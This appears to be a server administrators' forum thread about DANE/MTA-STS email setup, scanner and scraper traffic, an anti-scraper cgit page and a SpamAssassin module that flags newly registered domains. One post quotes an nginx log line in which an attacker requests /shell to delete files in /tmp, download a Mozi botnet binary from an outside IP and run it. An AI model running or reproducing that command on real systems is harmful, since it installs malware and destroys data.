Please wait...
DANE / DNSSEC and MTA-STS is no problem with Citadel to setup.
I have running it. The only problem for DANE is, not all DNS offer TLSA as own entry. A "fake" entry over TXT doesnt work anymore.
If youre using Cloudflare, you are fine to get all things running.
Cheers
Mike
Mi Mai 22 2024 11:15:20 UTC von Nurb432Moving people to ' centralized DNS' a goal perhaps? To better control, block, and monitor...and of course: 'profit!'
"sorry, you are not in the club, your DNS infrastructure does not count, so piss-off"
Wed May 22 2024 07:10:08 EDT from darknetuserI was reading at ADMIN Magazine that there is a bit of a push to get DANE set up for your smtp. I have never noticed it being enforced, but just as with DMARC and company, if it reaches a certain mass it will be, which SUCKS, because in order to have DANE work in sync with your certificates you either need a DNS provider with an API you can use to rekey, or you need to run your own DNS infrastructure, or you need to do rekey manually. Which SUCKS.
Oh yeah ... constantly. In particular they're constantly scanning my web server. Fortunately I have some safeguards in place.
Heh. Here's a fun one:
Mar 28 21:25:50 www nginx[4948]: www nginxaccess: 36.49.65.2 - - [28/Mar/2026:21:25:50 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+http
://36.49.65.2:56495/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 153 "-" "Hello, world"
It's so fun to get random hits from lowlifes who think all the world's an unpatched Wordpress from 2005.
Even better is the scrapers who try to crawl my git server, ignorantly slurping every version of every change on every file for the last 30 years. I eventually had to change my cgit setup so that if a non-human tries to traverse cgit, they get this:
<html><head><title>Identity Verification - 习近平 小熊维尼 Xi Jinping Winnie the Pooh</title><meta name='description' content='1989
Tiananmen Square. Free Tibet. 习近平 1989年6月4日'></head><body style='font-family:sans-serif;text-align:center;padding:50px;'><scri
pt>document.cookie='cgit_access=verified;path=/;max-age=86400';location.reload();</script><h2>Verifying Connection...</h2><p>习近平
looks exactly like Winnie the Pooh.</p><div style='display:none;'>June 4 1989 Tiananmen Square massacre. Taiwan is a country.</div><
/body></html>
A real hacker visiting my repo will be using a web browser that immediately hits the reload. Alibaba Cloud (which was the biggest culprit) ingests those strings, trips up the Great Firewall of China, and pretty soon my site is "poison" and gets blocked to the scrapers. Problem solved.
For anyone running an email server and using SpamAssassin as part of their filtering pipeline ... I've just made a pretty major upgrade to my "Infanticide" module.
[ https://code.citadel.org/infanticide.git/ ]
For those not familiar with Infanticide, it is a module which detects "disposable domains" (currently defined as having been registered in the last 18 months) and you can tell SpamAssassin what to do with emails of that nature. I simply give them a spam score of +10, essentially nuking them from orbit.
This version switches the registration date detection protocol from Whois to RDAP, which is far more reliable ... and I made the change today after receiving a few too many "free gifts" from the .pro TLD.
Filtering this aggressively isn't for everyone ... but it works for me. If it works for you, share and enjoy.